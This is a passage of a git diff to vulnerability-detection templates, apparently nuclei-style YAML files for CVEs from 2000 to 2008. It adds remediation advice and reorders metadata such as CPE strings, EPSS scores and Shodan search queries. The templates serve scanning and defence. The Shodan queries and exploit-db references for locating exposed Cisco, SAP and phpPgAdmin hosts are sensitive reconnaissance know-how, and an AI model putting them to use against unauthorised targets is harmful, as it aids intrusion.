http/cves/2015/CVE-2015-2755.yaml | 8 +++++--- http/cves/2015/CVE-2015-2807.yaml | 8 +++++--- http/cves/2015/CVE-2015-2863.yaml | 4 +++- http/cves/2015/CVE-2015-2996.yaml | 6 ++++-- http/cves/2015/CVE-2015-3035.yaml | 8 +++++--- http/cves/2015/CVE-2015-3224.yaml | 4 +++- http/cves/2015/CVE-2015-3337.yaml | 4 +++- http/cves/2015/CVE-2015-3648.yaml | 4 +++- http/cves/2015/CVE-2015-3897.yaml | 4 +++- http/cves/2015/CVE-2015-4050.yaml | 4 +++- http/cves/2015/CVE-2015-4062.yaml | 10 +++++----- http/cves/2015/CVE-2015-4063.yaml | 8 ++++---- http/cves/2015/CVE-2015-4074.yaml | 6 ++++-- http/cves/2015/CVE-2015-4127.yaml | 6 ++++-- http/cves/2015/CVE-2015-4414.yaml | 8 +++++--- http/cves/2015/CVE-2015-4632.yaml | 4 +++- http/cves/2015/CVE-2015-4666.yaml | 4 +++- http/cves/2015/CVE-2015-4668.yaml | 4 +++- http/cves/2015/CVE-2015-4694.yaml | 8 +++++--- http/cves/2015/CVE-2015-5354.yaml | 4 +++- http/cves/2015/CVE-2015-5461.yaml | 8 +++++--- http/cves/2015/CVE-2015-5469.yaml | 6 ++++-- http/cves/2015/CVE-2015-5471.yaml | 8 ++++---- http/cves/2015/CVE-2015-5531.yaml | 4 +++- http/cves/2015/CVE-2015-5688.yaml | 6 ++++-- http/cves/2015/CVE-2015-6477.yaml | 4 +++- http/cves/2015/CVE-2015-6544.yaml | 4 +++- http/cves/2015/CVE-2015-6920.yaml | 6 ++++-- http/cves/2015/CVE-2015-7245.yaml | 4 +++- http/cves/2015/CVE-2015-7297.yaml | 4 +++- http/cves/2015/CVE-2015-7377.yaml | 6 ++++-- http/cves/2015/CVE-2015-7450.yaml | 6 ++++-- http/cves/2015/CVE-2015-7780.yaml | 4 +++- http/cves/2015/CVE-2015-7823.yaml | 4 +++- http/cves/2015/CVE-2015-8349.yaml | 4 +++- http/cves/2015/CVE-2015-8399.yaml | 6 ++++-- http/cves/2015/CVE-2015-8813.yaml | 4 +++- http/cves/2015/CVE-2015-9312.yaml | 8 ++++---- http/cves/2015/CVE-2015-9323.yaml | 6 +++--- http/cves/2015/CVE-2015-9414.yaml | 8 +++++--- http/cves/2015/CVE-2015-9480.yaml | 8 +++++--- http/cves/2016/CVE-2016-0957.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000126.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000127.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000128.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000129.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000130.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000131.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000132.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000133.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000134.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000135.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000136.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000137.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000138.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000139.yaml | 8 +++++--- http/cves/2016/CVE-2016-1000140.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000141.yaml | 8 ++++---- http/cves/2016/CVE-2016-1000142.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000143.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000146.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000148.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000149.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000152.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000153.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000154.yaml | 6 ++++-- http/cves/2016/CVE-2016-1000155.yaml | 6 ++++-- http/cves/2016/CVE-2016-10033.yaml | 4 +++- http/cves/2016/CVE-2016-10108.yaml | 6 ++++-- http/cves/2016/CVE-2016-10134.yaml | 4 +++- http/cves/2016/CVE-2016-10367.yaml | 8 +++++--- http/cves/2016/CVE-2016-10368.yaml | 4 +++- http/cves/2016/CVE-2016-10924.yaml | 8 +++++--- http/cves/2016/CVE-2016-10940.yaml | 6 ++++-- http/cves/2016/CVE-2016-10956.yaml | 8 +++++--- http/cves/2016/CVE-2016-10960.yaml | 8 +++++--- http/cves/2016/CVE-2016-10973.yaml | 8 +++++--- http/cves/2016/CVE-2016-10993.yaml | 6 ++++-- http/cves/2016/CVE-2016-1555.yaml | 4 +++- http/cves/2016/CVE-2016-2389.yaml | 6 ++++-- http/cves/2016/CVE-2016-3081.yaml | 4 +++- http/cves/2016/CVE-2016-3088.yaml | 4 +++- http/cves/2016/CVE-2016-3978.yaml | 4 +++- http/cves/2016/CVE-2016-4437.yaml | 4 +++- http/cves/2016/CVE-2016-4975.yaml | 4 ++-- http/cves/2016/CVE-2016-4977.yaml | 4 ++-- http/cves/2016/CVE-2016-5649.yaml | 4 +++- http/cves/2016/CVE-2016-6195.yaml | 8 +++++--- http/cves/2016/CVE-2016-6277.yaml | 4 +++- http/cves/2016/CVE-2016-6601.yaml | 4 +++- http/cves/2016/CVE-2016-7552.yaml | 4 +++- http/cves/2016/CVE-2016-7834.yaml | 6 +++--- http/cves/2016/CVE-2016-7981.yaml | 4 +++- http/cves/2016/CVE-2016-8527.yaml | 4 +++- http/cves/2017/CVE-2017-0929.yaml | 4 +++- http/cves/2017/CVE-2017-1000028.yaml | 4 +++- http/cves/2017/CVE-2017-1000029.yaml | 4 +++- http/cves/2017/CVE-2017-1000163.yaml | 4 +++- http/cves/2017/CVE-2017-1000170.yaml | 4 +++- http/cves/2017/CVE-2017-1000486.yaml | 4 +++- http/cves/2017/CVE-2017-10075.yaml | 8 +++++--- http/cves/2017/CVE-2017-10271.yaml | 4 +++- http/cves/2017/CVE-2017-10974.yaml | 4 +++- http/cves/2017/CVE-2017-11165.yaml | 8 +++++--- http/cves/2017/CVE-2017-11444.yaml | 4 +++- http/cves/2017/CVE-2017-11512.yaml | 8 +++++--- http/cves/2017/CVE-2017-11586.yaml | 6 ++++-- http/cves/2017/CVE-2017-11610.yaml | 6 ++++-- http/cves/2017/CVE-2017-11629.yaml | 6 ++++-- http/cves/2017/CVE-2017-12138.yaml | 4 +++- http/cves/2017/CVE-2017-12149.yaml | 4 +++- http/cves/2017/CVE-2017-12542.yaml | 4 +++- http/cves/2017/CVE-2017-12544.yaml | 4 +++- http/cves/2017/CVE-2017-12583.yaml | 6 ++++-- http/cves/2017/CVE-2017-12611.yaml | 4 +++- http/cves/2017/CVE-2017-12615.yaml | 6 ++++-- http/cves/2017/CVE-2017-12617.yaml | 6 ++++-- http/cves/2017/CVE-2017-12629.yaml | 4 +++- http/cves/2017/CVE-2017-12635.yaml | 4 +++- http/cves/2017/CVE-2017-12637.yaml | 6 ++++-- http/cves/2017/CVE-2017-12794.yaml | 4 +++- http/cves/2017/CVE-2017-14135.yaml | 6 ++++-- http/cves/2017/CVE-2017-14186.yaml | 8 +++++--- http/cves/2017/CVE-2017-14524.yaml | 4 +++- http/cves/2017/CVE-2017-14535.yaml | 4 +++- http/cves/2017/CVE-2017-14537.yaml | 4 +++- http/cves/2017/CVE-2017-14622.yaml | 8 +++++--- http/cves/2017/CVE-2017-14651.yaml | 4 +++- http/cves/2017/CVE-2017-14849.yaml | 4 +++- http/cves/2017/CVE-2017-15287.yaml | 6 ++++-- http/cves/2017/CVE-2017-15363.yaml | 6 ++++-- http/cves/2017/CVE-2017-15647.yaml | 4 +++- http/cves/2017/CVE-2017-15715.yaml | 4 +++- http/cves/2017/CVE-2017-15944.yaml | 4 +++- http/cves/2017/CVE-2017-16806.yaml | 4 +++- http/cves/2017/CVE-2017-16877.yaml | 4 +++- http/cves/2017/CVE-2017-16894.yaml | 10 ++++++---- http/cves/2017/CVE-2017-17043.yaml | 6 ++++-- http/cves/2017/CVE-2017-17059.yaml | 6 ++++-- http/cves/2017/CVE-2017-17451.yaml | 6 ++++-- http/cves/2017/CVE-2017-17562.yaml | 4 +++- http/cves/2017/CVE-2017-17731.yaml | 8 +++++--- http/cves/2017/CVE-2017-17736.yaml | 8 +++++--- http/cves/2017/CVE-2017-18024.yaml | 4 +++- http/cves/2017/CVE-2017-18536.yaml | 6 ++++-- http/cves/2017/CVE-2017-18598.yaml | 6 ++++-- http/cves/2017/CVE-2017-18638.yaml | 4 +++- http/cves/2017/CVE-2017-3506.yaml | 4 +++- http/cves/2017/CVE-2017-3528.yaml | 4 +++- http/cves/2017/CVE-2017-4011.yaml | 4 +++- http/cves/2017/CVE-2017-5487.yaml | 8 +++++--- http/cves/2017/CVE-2017-5521.yaml | 4 +++- http/cves/2017/CVE-2017-5631.yaml | 4 +++- http/cves/2017/CVE-2017-5638.yaml | 8 +++++--- http/cves/2017/CVE-2017-5689.yaml | 8 +++++--- http/cves/2017/CVE-2017-5982.yaml | 4 +++- http/cves/2017/CVE-2017-6090.yaml | 6 ++++-- http/cves/2017/CVE-2017-7269.yaml | 4 +++- http/cves/2017/CVE-2017-7391.yaml | 4 +++- http/cves/2017/CVE-2017-7615.yaml | 4 +++- http/cves/2017/CVE-2017-7921.yaml | 4 +++- http/cves/2017/CVE-2017-7925.yaml | 6 ++++-- http/cves/2017/CVE-2017-8229.yaml | 10 ++++++---- http/cves/2017/CVE-2017-8917.yaml | 8 +++++--- http/cves/2017/CVE-2017-9140.yaml | 4 ++-- http/cves/2017/CVE-2017-9288.yaml | 6 ++++-- http/cves/2017/CVE-2017-9416.yaml | 6 ++++-- http/cves/2017/CVE-2017-9506.yaml | 6 ++++-- http/cves/2017/CVE-2017-9791.yaml | 10 ++++++---- http/cves/2017/CVE-2017-9805.yaml | 4 +++- http/cves/2017/CVE-2017-9822.yaml | 4 +++- http/cves/2017/CVE-2017-9833.yaml | 4 +++- http/cves/2017/CVE-2017-9841.yaml | 4 +++- http/cves/2021/CVE-2021-43495.yaml | 2 ++ http/cves/2023/CVE-2023-0527.yaml | 2 +- http/cves/2023/CVE-2023-32117.yaml | 2 +- http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml | 2 +- 447 files changed, 1447 insertions(+), 795 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 066c77444f..eb403449b2 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -5,19 +5,19 @@ info: author: r3naissance severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + remediation: Upgrade to the latest version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114 - remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.09258 - cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* epss-percentile: 0.93895 + cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 47e397a19a..e4375cb977 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + remediation: | + Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 @@ -17,14 +19,14 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* epss-percentile: 0.9824 + cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: product:"Cisco IOS http config" && 200 + max-request: 1 vendor: cisco product: ios + shodan-query: product:"Cisco IOS http config" && 200 tags: cve,cve2001,cisco,ios,auth-bypass http: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index cfbaf5b880..6af54c6cd2 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + remediation: | + Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. reference: - http://www.redhat.com/support/errata/RHSA-2002-204.html - http://www.debian.org/security/2002/dsa-191 @@ -17,8 +19,8 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* epss-percentile: 0.9253 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: squirrelmail diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 40143f9958..cefb1e2ae3 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -5,21 +5,21 @@ info: author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 - http://security.gentoo.org/glsa/glsa-200405-16.xml - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858 - http://marc.info/?l=bugtraq&m=108334862800260 - remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* epss-percentile: 0.88244 + cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sgi diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 749de068b3..c14de273e0 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + remediation: | + Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 @@ -17,8 +19,8 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* epss-percentile: 0.82864 + cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openbb diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index fc6dc4b670..9a8d90ed9a 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -5,21 +5,21 @@ info: author: CasperGN severity: medium description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 - http://marc.info/?l=bugtraq&m=112240869130356&w=2 - http://securitytracker.com/id?1014584 - remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* epss-percentile: 0.83354 + cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibm diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 32e44d9bb5..a023ce2b97 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. + remediation: | + Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2005-3344 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344 @@ -17,8 +19,8 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* epss-percentile: 0.87895 + cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 vendor: horde diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index f97265581d..95cf0166c9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/26488 - https://cxsecurity.com/issue/WLB-2005110025 @@ -19,13 +21,13 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* epss-percentile: 0.89376 + cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"SAP Business Server Pages Team" vendor: sap product: sap_web_application_server + shodan-query: html:"SAP Business Server Pages Team" tags: cve,cve2005,sap,redirect,business http: diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 8fb587280c..1523932118 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + remediation: | + Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 @@ -15,8 +17,8 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* epss-percentile: 0.65316 + cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cofax diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 55fd90bb63..44fd20a1ff 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + remediation: | + Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 @@ -16,8 +18,8 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* epss-percentile: 0.81872 + cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cherokee diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 81e94fa41e..65247aade2 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. + remediation: | + Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/27948 - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE @@ -17,8 +19,8 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.2925 - cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* epss-percentile: 0.96295 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: squirrelmail diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 5e51fe4524..4e3a181265 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter. + remediation: | + Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - https://nvd.nist.gov/vuln/detail/CVE-2007-0885 @@ -14,8 +16,8 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0059 - cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* epss-percentile: 0.75518 + cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rainbow_portal diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 336f8dae64..c7015b0ac2 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. + remediation: | + Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/4307 - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 @@ -15,8 +17,8 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* epss-percentile: 0.86094 + cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 574d190962..8b1892de00 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + remediation: | + Update to the latest version of Apache Struts2 reference: - https://www.guildhab.top/?p=2326 - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 @@ -18,8 +20,8 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.14147 - cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* epss-percentile: 0.94981 + cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: opensymphony diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index f6dfc4146b..2765d841da 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. + remediation: | + Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/30090 - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* epss-percentile: 0.8841 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"phpPgAdmin" vendor: phppgadmin product: phppgadmin + shodan-query: http.title:"phpPgAdmin" tags: cve,cve2007,xss,pgadmin,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 9a00317853..046b971242 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + remediation: | + Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 @@ -18,8 +20,8 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* epss-percentile: 0.85218 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index c7c880b9f0..98b0b24f00 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + remediation: | + Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 @@ -18,8 +20,8 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00938 - cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* epss-percentile: 0.81093 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index ce8f0401d5..84e9b66b44 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -6,6 +6,8 @@ info: 